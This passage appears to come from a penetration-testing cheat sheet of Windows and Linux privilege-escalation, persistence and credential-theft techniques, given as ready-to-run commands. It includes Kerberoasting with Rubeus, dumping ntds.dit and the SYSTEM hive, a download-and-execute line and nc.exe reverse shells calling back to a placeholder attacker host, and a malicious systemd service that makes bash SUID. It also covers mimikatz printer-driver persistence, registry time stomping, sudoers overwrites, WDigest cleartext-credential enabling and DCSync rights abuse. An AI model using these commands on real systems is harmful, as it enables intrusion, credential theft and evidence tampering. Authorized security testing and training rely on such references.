PS C:\> [Rubeus.Program]::MainString("kerberoast /creduser:<DOMAIN>\<USERNAME> /credpassword:<PASSWORD>")
RunasCs
C:\> ./RunasCs.exe -l 3 -d <DOMAIN> "<USERNAME>" '<PASSWORD>' 'C:\Users\<USERNAME>\Downloads\<FILE>.exe'
C:\> ./RunasCs.exe -d <DOMAIN> "<USERNAME>" '<PASSWORD>' cmd.exe -r <LHOST>:<LPORT>
SeBackupPrivilege Privilege Escalation (diskshadow)
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
Script for PowerShell Environment
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias foobarp
createp
expose %foobar% z:p
PS C:\> diskshadow /s <FILE>.txt
Copy ntds.dit
PS C:\> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
Export System Registry Value
PS C:\> reg save HKLM\SYSTEM c:\temp\system
Download ndts.dit
and system and get the hashes from secretsdump.py
of the impacket-suite.
setcap
$ setcap cap_setgid,cap_setuid+eip <FILE>
SharpHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
PS C:\> .\SharpHound.exe --CollectionMethod All
Shell Upgrade
$ python -c 'import pty;pty.spawn("/bin/bash")'
or
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ Ctrl + z
$ stty raw -echo
fg
Enter
Enter
$ export XTERM=xterm
Alternatively:
$ script -q /dev/null -c bash
$ /usr/bin/script -qc /bin/bash /dev/null
Oneliner
$ stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
Fixing Staircase Effect
$ env reset
or
$ stty onlcr
Sherlock
Config
Add Find-AllVulns
at the end of the script to run it as soon as it get's loaded.
10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19 ] }
14393 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 446 ] }
default { $VulnStatus = "Not Vulnerable" }
}
Set-ExploitTable $MSBulletin $VulnStatus
}
Find-AllVulns
$ IEX(New-Object Net.webclient).downloadString('http://<LHOST>/Sherlock.ps1')
systemctl
Malicious Service Privilege Escalation
Payload
[Unit]
Description=Example Service
[Service]
Type=simple
ExecStart=chmod +s /bin/bash
Restart=always
[Install]
WantedBy=multi-user.target
Installation
$ echo '[Unit]
Description=Example Service
[Service]
Type=simple
ExecStart=chmod +s /bin/bash
Restart=always
[Install]
WantedBy=multi-user.target' > /etc/systemd/system/<SERVICE>.service
Execution
$ sudo systemctl restart <SERVICE>
Time Stomping
$dateTime = New-Object System.DateTime(1999,12,26)
$regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey("SYSTEM\CurrentControlSet\Services\helpsvc",$true)[RegRoutines.NativeMethods]::SetRegistryKeyDateTime($regKey, $dateTime)
Universal Privilege Escalation and Persistence Printer
$printerName = 'Pentest Lab Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
Add-PrinterDriver -Name 'Generic / Text Only'
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
User Group Exploitation
https://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/
Possibilities
- Edit /etc/passwd // copy it to /tmp to edit
- Add new SSH Key to /root/
Find modifyable Files
$ find / -group root -perm -g=w ! -type l 2>/dev/null | grep -v 'proc\|sys' | xargs ls -l
Option 1
#!/usr/bin/env python
import os
import sys
try:
os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')
except:
sys.exit()
Option 2
#!/usr/bin/env python
import os
import sys
try:
os.system('echo "$USER ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')
except:
sys.exit()
VSS
Abusing Server Operator Group Membership to get a Reverse Shell
$ sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe <LHOST> <LPORT>"
$ sc.exe stop vss
$ sc.exe start vss
WDigest
Store Cleartext Credentials Cleartext in LSASS
PS C:\> Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name "UseLogonCredential" -Value '1'"
Whisker
C:\> .\Whisker.exe add /target:<USERNAME>
Windows-Exploit-Suggester
Prerequisites
$ python -m pip install xlrd
Update
$ ./windows-exploit-suggester.py --update
Usage
$ ./windows-exploit-suggester.py --database 2020-07-15-mssb.xls --systeminfo sysinfo
winexe
$ winexe -U '<USERNAME%PASSWORD>' //<RHOST> cmd.exe
$ winexe -U '<USERNAME%PASSWORD>' --system //<RHOST> cmd.exe
writeDACL
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
Usage
PS C:\> $SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $SecPassword)
PS C:\> Add-ObjectACL -PrincipalIdentity <USERNAME> -Credential $Cred -Rights DCSync